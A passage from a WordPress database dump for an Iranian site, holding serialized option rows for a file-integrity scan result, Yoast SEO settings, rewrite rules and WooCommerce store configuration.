file\";}i:40;a:8:{s:6:\"ENGINE\";s:8:\"fscanner\";s:8:\"SEVERITY\";s:22:\"enSuspiciousThreatType\";s:8:\"FILE_MD5\";s:32:\"20dde9c7a1294b5063a1a50bdddfc016\";s:4:\"FILE\";s:68:\"wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css\";s:11:\"THREAT_NAME\";s:17:\"Heur.CoreFile.gen\";s:10:\"THREAT_SIG\";s:32:\"20dde9c7a1294b5063a1a50bdddfc016\";s:6:\"THREAT\";s:21:\"Modified core file...\";s:7:\"DETAILS\";s:27:\"Detected modified core file\";}}\";','no'),
(6322,'qtr_scan_cron_args','[]','no'),
(6422,'wpseo','a:115:{s:8:\"tracking\";b:0;s:16:\"toggled_tracking\";b:0;s:22:\"license_server_version\";s:1:\"2\";s:15:\"ms_defaults_set\";b:0;s:40:\"ignore_search_engines_discouraged_notice\";b:0;s:19:\"indexing_first_time\";b:1;s:16:\"indexing_started\";b:0;s:15:\"indexing_reason\";s:21:\"post_type_made_public\";s:29:\"indexables_indexing_completed\";b:1;s:13:\"index_now_key\";s:0:\"\";s:7:\"version\";s:4:\"25.6\";s:16:\"previous_version\";s:4:\"24.9\";s:20:\"disableadvanced_meta\";b:1;s:30:\"enable_headless_rest_endpoints\";b:1;s:17:\"ryte_indexability\";b:1;s:11:\"baiduverify\";s:0:\"\";s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";s:9:\"site_type\";s:4:\"blog\";s:20:\"has_multiple_authors\";b:1;s:16:\"environment_type\";s:10:\"production\";s:23:\"content_analysis_active\";b:1;s:23:\"keyword_analysis_active\";b:1;s:34:\"inclusive_language_analysis_active\";b:0;s:21:\"enable_admin_bar_menu\";b:1;s:26:\"enable_cornerstone_content\";b:1;s:18:\"enable_xml_sitemap\";b:1;s:24:\"enable_text_link_counter\";b:1;s:16:\"enable_index_now\";b:1;s:19:\"enable_ai_generator\";b:0;s:22:\"ai_enabled_pre_default\";b:0;s:22:\"show_onboarding_notice\";b:0;s:18:\"first_activated_on\";i:1585828788;s:13:\"myyoast-oauth\";b:0;s:26:\"semrush_integration_active\";b:1;s:14:\"semrush_tokens\";a:0:{}s:20:\"semrush_country_code\";s:2:\"us\";s:19:\"permalink_structure\";s:12:\"/%postname%/\";s:8:\"home_url\";s:23:\"https://ictbank.ir/blog\";s:18:\"dynamic_permalinks\";b:0;s:17:\"category_base_url\";s:0:\"\";s:12:\"tag_base_url\";s:0:\"\";s:21:\"custom_taxonomy_slugs\";a:3:{s:22:\"elementor_library_type\";s:22:\"elementor_library_type\";s:26:\"elementor_library_category\";s:26:\"elementor_library_category\";s:19:\"elementor_font_type\";s:19:\"elementor_font_type\";}s:29:\"enable_enhanced_slack_sharing\";b:1;s:23:\"enable_metabox_insights\";b:1;s:23:\"enable_link_suggestions\";b:1;s:26:\"algolia_integration_active\";b:0;s:14:\"import_cursors\";a:0:{}s:13:\"workouts_data\";a:1:{s:13:\"configuration\";a:1:{s:13:\"finishedSteps\";a:0:{}}}s:28:\"configuration_finished_steps\";a:0:{}s:36:\"dismiss_configuration_workout_notice\";b:1;s:34:\"dismiss_premium_deactivated_notice\";b:0;s:19:\"importing_completed\";a:5:{s:30:\"aioseo_custom_archive_settings\";b:1;s:31:\"aioseo_default_archive_settings\";b:1;s:23:\"aioseo_general_settings\";b:1;s:32:\"aioseo_posttype_default_settings\";b:1;s:24:\"aioseo_taxonomy_settings\";b:1;}s:26:\"wincher_integration_active\";b:1;s:14:\"wincher_tokens\";a:0:{}s:36:\"wincher_automatically_add_keyphrases\";b:0;s:18:\"wincher_website_id\";s:0:\"\";s:18:\"first_time_install\";b:1;s:34:\"should_redirect_after_install_free\";b:0;s:34:\"activation_redirect_timestamp_free\";i:1693154450;s:18:\"remove_feed_global\";b:0;s:27:\"remove_feed_global_comments\";b:0;s:25:\"remove_feed_post_comments\";b:0;s:19:\"remove_feed_authors\";b:0;s:22:\"remove_feed_categories\";b:0;s:16:\"remove_feed_tags\";b:0;s:29:\"remove_feed_custom_taxonomies\";b:0;s:22:\"remove_feed_post_types\";b:0;s:18:\"remove_feed_search\";b:0;s:21:\"remove_atom_rdf_feeds\";b:0;s:17:\"remove_shortlinks\";b:0;s:21:\"remove_rest_api_links\";b:0;s:20:\"remove_rsd_wlw_links\";b:0;s:19:\"remove_oembed_links\";b:0;s:16:\"remove_generator\";b:0;s:20:\"remove_emoji_scripts\";b:0;s:24:\"remove_powered_by_header\";b:0;s:22:\"remove_pingback_header\";b:0;s:28:\"clean_campaign_tracking_urls\";b:0;s:16:\"clean_permalinks\";b:0;s:32:\"clean_permalinks_extra_variables\";s:0:\"\";s:14:\"search_cleanup\";b:0;s:20:\"search_cleanup_emoji\";b:0;s:23:\"search_cleanup_patterns\";b:0;s:22:\"search_character_limit\";i:50;s:20:\"deny_search_crawling\";b:0;s:21:\"deny_wp_json_crawling\";b:0;s:20:\"deny_adsbot_crawling\";b:0;s:19:\"deny_ccbot_crawling\";b:0;s:29:\"deny_google_extended_crawling\";b:0;s:20:\"deny_gptbot_crawling\";b:0;s:27:\"redirect_search_pretty_urls\";b:0;s:29:\"least_readability_ignore_list\";a:0:{}s:27:\"least_seo_score_ignore_list\";a:0:{}s:23:\"most_linked_ignore_list\";a:0:{}s:24:\"least_linked_ignore_list\";a:0:{}s:28:\"indexables_page_reading_list\";a:5:{i:0;b:0;i:1;b:0;i:2;b:0;i:3;b:0;i:4;b:0;}s:25:\"indexables_overview_state\";s:21:\"dashboard-not-visited\";s:28:\"last_known_public_post_types\";a:3:{i:0;s:4:\"post\";i:1;s:4:\"page\";i:2;s:18:\"e-floating-buttons\";}s:28:\"last_known_public_taxonomies\";a:3:{i:0;s:8:\"category\";i:1;s:8:\"post_tag\";i:2;s:11:\"post_format\";}s:23:\"last_known_no_unindexed\";a:6:{s:40:\"wpseo_total_unindexed_post_type_archives\";i:1758598987;s:35:\"wpseo_total_unindexed_general_items\";i:1758598987;s:31:\"wpseo_unindexed_post_link_count\";i:1758598987;s:31:\"wpseo_unindexed_term_link_count\";i:1758598987;s:27:\"wpseo_total_unindexed_posts\";i:1758632171;s:27:\"wpseo_total_unindexed_terms\";i:1758632171;}s:14:\"new_post_types\";a:1:{i:2;s:18:\"e-floating-buttons\";}s:14:\"new_taxonomies\";a:0:{}s:34:\"show_new_content_type_notification\";b:1;s:44:\"site_kit_configuration_permanently_dismissed\";b:0;s:18:\"site_kit_connected\";b:0;s:37:\"site_kit_tracking_setup_widget_loaded\";s:2:\"no\";s:41:\"site_kit_tracking_first_interaction_stage\";s:0:\"\";s:40:\"site_kit_tracking_last_interaction_stage\";s:0:\"\";s:52:\"site_kit_tracking_setup_widget_temporarily_dismissed\";s:2:\"no\";s:52:\"site_kit_tracking_setup_widget_permanently_dismissed\";s:2:\"no\";s:31:\"google_site_kit_feature_enabled\";b:0;s:25:\"ai_free_sparks_started_on\";N;s:15:\"enable_llms_txt\";b:0;}','yes'),
(6423,'wpseo_titles','a:71:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% %%sitename%%\";s:19:\"metadesc-home-wpseo\";s:0:\"\";s:21:\"metadesc-author-wpseo\";s:0:\"\";s:22:\"metadesc-archive-wpseo\";s:0:\"\";s:9:\"rssbefore\";s:0:\"\";s:8:\"rssafter\";s:53:\"The post %%POSTLINK%% appeared first on %%BLOGLINK%%.\";s:20:\"noindex-author-wpseo\";b:0;s:28:\"noindex-author-noposts-wpseo\";b:1;s:21:\"noindex-archive-wpseo\";b:1;s:14:\"disable-author\";b:0;s:12:\"disable-date\";b:0;s:19:\"disable-post_format\";b:0;s:18:\"disable-attachment\";b:1;s:23:\"is-media-purge-relevant\";b:0;s:20:\"breadcrumbs-404crumb\";s:25:\"Error 404: Page not found\";s:29:\"breadcrumbs-display-blog-page\";b:1;s:20:\"breadcrumbs-boldlast\";b:0;s:25:\"breadcrumbs-archiveprefix\";s:12:\"Archives for\";s:18:\"breadcrumbs-enable\";b:0;s:16:\"breadcrumbs-home\";s:4:\"Home\";s:18:\"breadcrumbs-prefix\";s:0:\"\";s:24:\"breadcrumbs-searchprefix\";s:16:\"You searched for\";s:15:\"breadcrumbs-sep\";s:7:\"»\";s:12:\"website_name\";s:10:\"ictbank.ir\";s:11:\"person_name\";s:0:\"\";s:11:\"person_logo\";s:0:\"\";s:14:\"person_logo_id\";i:0;s:22:\"alternate_website_name\";s:0:\"\";s:12:\"company_logo\";s:0:\"\";s:15:\"company_logo_id\";i:0;s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:6:\"person\";s:25:\"company_or_person_user_id\";i:2;s:17:\"stripcategorybase\";b:0;s:10:\"title-post\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-post\";s:0:\"\";s:12:\"noindex-post\";b:0;s:13:\"showdate-post\";b:0;s:23:\"display-metabox-pt-post\";b:1;s:23:\"post_types-post-maintax\";i:0;s:10:\"title-page\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:13:\"metadesc-page\";s:0:\"\";s:12:\"noindex-page\";b:0;s:13:\"showdate-page\";b:0;s:23:\"display-metabox-pt-page\";b:1;s:23:\"post_types-page-maintax\";i:0;s:16:\"title-attachment\";s:39:\"%%title%% %%page%% %%sep%% %%sitename%%\";s:19:\"metadesc-attachment\";s:0:\"\";s:18:\"noindex-attachment\";b:0;s:19:\"showdate-attachment\";b:0;s:29:\"display-metabox-pt-attachment\";b:1;s:29:\"post_types-attachment-maintax\";i:0;s:18:\"title-tax-category\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-category\";s:0:\"\";s:28:\"display-metabox-tax-category\";b:1;s:20:\"noindex-tax-category\";b:0;s:18:\"title-tax-post_tag\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:21:\"metadesc-tax-post_tag\";s:0:\"\";s:28:\"display-metabox-tax-post_tag\";b:1;s:20:\"noindex-tax-post_tag\";b:0;s:21:\"title-tax-post_format\";s:53:\"%%term_title%% Archives %%page%% %%sep%% %%sitename%%\";s:24:\"metadesc-tax-post_format\";s:0:\"\";s:31:\"display-metabox-tax-post_format\";b:1;s:23:\"noindex-tax-post_format\";b:1;}','yes'),
(6424,'wpseo_social','a:19:{s:13:\"facebook_site\";s:0:\"\";s:13:\"instagram_url\";s:0:\"\";s:12:\"linkedin_url\";s:0:\"\";s:11:\"myspace_url\";s:0:\"\";s:16:\"og_default_image\";s:0:\"\";s:19:\"og_default_image_id\";s:0:\"\";s:18:\"og_frontpage_title\";s:0:\"\";s:17:\"og_frontpage_desc\";s:0:\"\";s:18:\"og_frontpage_image\";s:0:\"\";s:21:\"og_frontpage_image_id\";s:0:\"\";s:9:\"opengraph\";b:1;s:13:\"pinterest_url\";s:0:\"\";s:15:\"pinterestverify\";s:0:\"\";s:7:\"twitter\";b:1;s:12:\"twitter_site\";s:0:\"\";s:17:\"twitter_card_type\";s:19:\"summary_large_image\";s:11:\"youtube_url\";s:0:\"\";s:13:\"wikipedia_url\";s:0:\"\";s:10:\"fbadminapp\";s:0:\"\";}','yes'),
(6425,'wpseo_flush_rewrite','1','yes'),
(6432,'wpseo_ryte','a:2:{s:6:\"status\";i:1;s:10:\"last_fetch\";i:1608811284;}','yes'),
(12532,'auto_core_update_notified','a:4:{s:4:\"type\";s:7:\"success\";s:5:\"email\";s:25:\"masoud.nikoofar@gmail.com\";s:7:\"version\";s:5:\"6.6.1\";s:9:\"timestamp\";i:1721763620;}','off'),
(38565,'yoast_migrations_free','a:1:{s:7:\"version\";s:4:\"25.6\";}','yes'),
(38581,'disallowed_keys','','no'),
(38582,'comment_previously_approved','1','yes'),
(38583,'auto_plugin_theme_update_emails','a:0:{}','no'),
(38584,'finished_updating_comment_type','1','yes'),
(45471,'rewrite_rules','a:117:{s:19:\"sitemap_index\\.xml$\";s:19:\"index.php?sitemap=1\";s:31:\"([^/]+?)-sitemap([0-9]+)?\\.xml$\";s:51:\"index.php?sitemap=$matches[1]&sitemap_n=$matches[2]\";s:24:\"([a-z]+)?-?sitemap\\.xsl$\";s:25:\"index.php?xsl=$matches[1]\";s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:17:\"^wp-sitemap\\.xml$\";s:23:\"index.php?sitemap=index\";s:17:\"^wp-sitemap\\.xsl$\";s:36:\"index.php?sitemap-stylesheet=sitemap\";s:23:\"^wp-sitemap-index\\.xsl$\";s:34:\"index.php?sitemap-stylesheet=index\";s:48:\"^wp-sitemap-([a-z]+?)-([a-z\\d_-]+?)-(\\d+?)\\.xml$\";s:75:\"index.php?sitemap=$matches[1]&sitemap-subtype=$matches[2]&paged=$matches[3]\";s:34:\"^wp-sitemap-([a-z]+?)-(\\d+?)\\.xml$\";s:47:\"index.php?sitemap=$matches[1]&paged=$matches[2]\";s:32:\"category/(.+?)/schema-preview/?$\";s:57:\"index.php?category=$matches[1]&schema-preview=$matches[3]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:46:\"e-floating-buttons/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:56:\"e-floating-buttons/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:76:\"e-floating-buttons/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:71:\"e-floating-buttons/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:71:\"e-floating-buttons/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:52:\"e-floating-buttons/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:35:\"e-floating-buttons/([^/]+)/embed/?$\";s:51:\"index.php?e-floating-buttons=$matches[1]&embed=true\";s:39:\"e-floating-buttons/([^/]+)/trackback/?$\";s:45:\"index.php?e-floating-buttons=$matches[1]&tb=1\";s:47:\"e-floating-buttons/([^/]+)/page/?([0-9]{1,})/?$\";s:58:\"index.php?e-floating-buttons=$matches[1]&paged=$matches[2]\";s:54:\"e-floating-buttons/([^/]+)/comment-page-([0-9]{1,})/?$\";s:58:\"index.php?e-floating-buttons=$matches[1]&cpage=$matches[2]\";s:52:\"e-floating-buttons/([^/]+)/schema-preview(/(.*))?/?$\";s:67:\"index.php?e-floating-buttons=$matches[1]&schema-preview=$matches[3]\";s:43:\"e-floating-buttons/([^/]+)(?:/([0-9]+))?/?$\";s:57:\"index.php?e-floating-buttons=$matches[1]&page=$matches[2]\";s:35:\"e-floating-buttons/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:45:\"e-floating-buttons/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:65:\"e-floating-buttons/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"e-floating-buttons/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:60:\"e-floating-buttons/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:41:\"e-floating-buttons/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=true\";s:32:\"feed/(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:27:\"(feed|rdf|rss|rss2|atom)/?$\";s:27:\"index.php?&feed=$matches[1]\";s:8:\"embed/?$\";s:21:\"index.php?&embed=true\";s:20:\"page/?([0-9]{1,})/?$\";s:28:\"index.php?&paged=$matches[1]\";s:27:\"comment-page-([0-9]{1,})/?$\";s:40:\"index.php?&page_id=647&cpage=$matches[1]\";s:25:\"schema-preview(/(.*))?/?$\";s:37:\"index.php?&schema-preview=$matches[2]\";s:41:\"comments/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:36:\"comments/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?&feed=$matches[1]&withcomments=1\";s:17:\"comments/embed/?$\";s:21:\"index.php?&embed=true\";s:44:\"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:39:\"search/(.+)/(feed|rdf|rss|rss2|atom)/?$\";s:40:\"index.php?s=$matches[1]&feed=$matches[2]\";s:20:\"search/(.+)/embed/?$\";s:34:\"index.php?s=$matches[1]&embed=true\";s:32:\"search/(.+)/page/?([0-9]{1,})/?$\";s:41:\"index.php?s=$matches[1]&paged=$matches[2]\";s:14:\"search/(.+)/?$\";s:23:\"index.php?s=$matches[1]\";s:47:\"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:42:\"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?author_name=$matches[1]&feed=$matches[2]\";s:23:\"author/([^/]+)/embed/?$\";s:44:\"index.php?author_name=$matches[1]&embed=true\";s:35:\"author/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?author_name=$matches[1]&paged=$matches[2]\";s:17:\"author/([^/]+)/?$\";s:33:\"index.php?author_name=$matches[1]\";s:69:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:64:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:80:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]\";s:45:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$\";s:74:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true\";s:57:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:81:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]\";s:39:\"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$\";s:63:\"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]\";s:56:\"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:51:\"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$\";s:64:\"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]\";s:32:\"([0-9]{4})/([0-9]{1,2})/embed/?$\";s:58:\"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true\";s:44:\"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$\";s:65:\"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]\";s:26:\"([0-9]{4})/([0-9]{1,2})/?$\";s:47:\"index.php?year=$matches[1]&monthnum=$matches[2]\";s:43:\"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:38:\"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?year=$matches[1]&feed=$matches[2]\";s:19:\"([0-9]{4})/embed/?$\";s:37:\"index.php?year=$matches[1]&embed=true\";s:31:\"([0-9]{4})/page/?([0-9]{1,})/?$\";s:44:\"index.php?year=$matches[1]&paged=$matches[2]\";s:13:\"([0-9]{4})/?$\";s:26:\"index.php?year=$matches[1]\";s:27:\".?.+?/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\".?.+?/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\".?.+?/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"(.?.+?)/embed/?$\";s:41:\"index.php?pagename=$matches[1]&embed=true\";s:20:\"(.?.+?)/trackback/?$\";s:35:\"index.php?pagename=$matches[1]&tb=1\";s:40:\"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:35:\"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:47:\"index.php?pagename=$matches[1]&feed=$matches[2]\";s:28:\"(.?.+?)/page/?([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&paged=$matches[2]\";s:35:\"(.?.+?)/comment-page-([0-9]{1,})/?$\";s:48:\"index.php?pagename=$matches[1]&cpage=$matches[2]\";s:33:\"(.?.+?)/schema-preview(/(.*))?/?$\";s:57:\"index.php?pagename=$matches[1]&schema-preview=$matches[3]\";s:24:\"(.?.+?)(?:/([0-9]+))?/?$\";s:47:\"index.php?pagename=$matches[1]&page=$matches[2]\";s:27:\"[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:37:\"[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:57:\"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:52:\"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:33:\"[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:16:\"([^/]+)/embed/?$\";s:37:\"index.php?name=$matches[1]&embed=true\";s:20:\"([^/]+)/trackback/?$\";s:31:\"index.php?name=$matches[1]&tb=1\";s:40:\"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:35:\"([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:43:\"index.php?name=$matches[1]&feed=$matches[2]\";s:28:\"([^/]+)/page/?([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&paged=$matches[2]\";s:35:\"([^/]+)/comment-page-([0-9]{1,})/?$\";s:44:\"index.php?name=$matches[1]&cpage=$matches[2]\";s:33:\"([^/]+)/schema-preview(/(.*))?/?$\";s:53:\"index.php?name=$matches[1]&schema-preview=$matches[3]\";s:24:\"([^/]+)(?:/([0-9]+))?/?$\";s:43:\"index.php?name=$matches[1]&page=$matches[2]\";s:16:\"[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:26:\"[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:46:\"[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:41:\"[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:22:\"[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";}','yes'),
(52738,'recovery_mode_email_last_sent','1758397819','yes'),
(52739,'wp_statistics_disable_addons','yes','yes'),
(52740,'wp_statistics_check_user_online','1689154929','yes'),
(52751,'action_scheduler_hybrid_store_demarkation','318','yes'),
(52752,'schema-ActionScheduler_StoreSchema','8.0.1758635909','yes'),
(52753,'schema-ActionScheduler_LoggerSchema','3.0.1645208504','yes'),
(52756,'woocommerce_schema_version','430','yes'),
(52757,'woocommerce_store_address','Tehran, Iran','yes'),
(52758,'woocommerce_store_address_2','','yes'),
(52759,'woocommerce_store_city','Tehran','yes'),
(52760,'woocommerce_default_country','IR:THR','yes'),
(52761,'woocommerce_store_postcode','1234567891','yes'),
(52762,'woocommerce_allowed_countries','all','yes'),
(52763,'woocommerce_all_except_countries','a:0:{}','yes'),
(52764,'woocommerce_specific_allowed_countries','a:0:{}','yes'),
(52765,'woocommerce_ship_to_countries','','yes'),
(52766,'woocommerce_specific_ship_to_countries','a:0:{}','yes'),
(52767,'woocommerce_default_customer_address','','yes'),
(52768,'woocommerce_calc_taxes','no','yes'),
(52769,'woocommerce_enable_coupons','yes','yes'),
(52770,'woocommerce_calc_discounts_sequentially','no','no'),
(52771,'woocommerce_currency','IRR','yes'),
(52772,'woocommerce_currency_pos','left','yes'),
(52773,'woocommerce_price_thousand_sep',',','yes'),
(52774,'woocommerce_price_decimal_sep','.','yes'),
(52775,'woocommerce_price_num_decimals','2','yes'),
(52776,'woocommerce_shop_page_id','319','yes'),
(52777,'woocommerce_cart_redirect_after_add','no','yes'),
(52778,'woocommerce_enable_ajax_add_to_cart','yes','yes'),
(52779,'woocommerce_placeholder_image','318','yes'),
(52780,'woocommerce_weight_unit','kg','yes'),
(52781,'woocommerce_dimension_unit','cm','yes'),
(52782,'woocommerce_enable_reviews','yes','yes'),
(52783,'woocommerce_review_rating_verification_label','yes','no'),
(52784,'woocommerce_review_rating_verification_required','no','no'),
(52785,'woocommerce_enable_review_rating','yes','yes'),
(52786,'woocommerce_review_rating_required','yes','no'),
(52787,'woocommerce_manage_stock','yes','yes'),
(52788,'woocommerce_hold_stock_minutes','60','no'),
(52789,'woocommerce_notify_low_stock','yes','no'),
(52790,'woocommerce_notify_no_stock','yes','no'),
(52791,'woocommerce_stock_email_recipient','masoud.nikoofar@gmail.com','no'),
(52792,'woocommerce_notify_low_stock_amount','2','no'),
(52793,'woocommerce_notify_no_stock_amount','0','yes'),
(52794,'woocommerce_hide_out_of_stock_items','no','yes'),
(52795,'woocommerce_stock_format','','yes'),
(52796,'woocommerce_file_download_method','force','no'),
(52797,'woocommerce_downloads_require_login','no','no'),
(52798,'woocommerce_downloads_grant_access_after_payment','yes','no'),
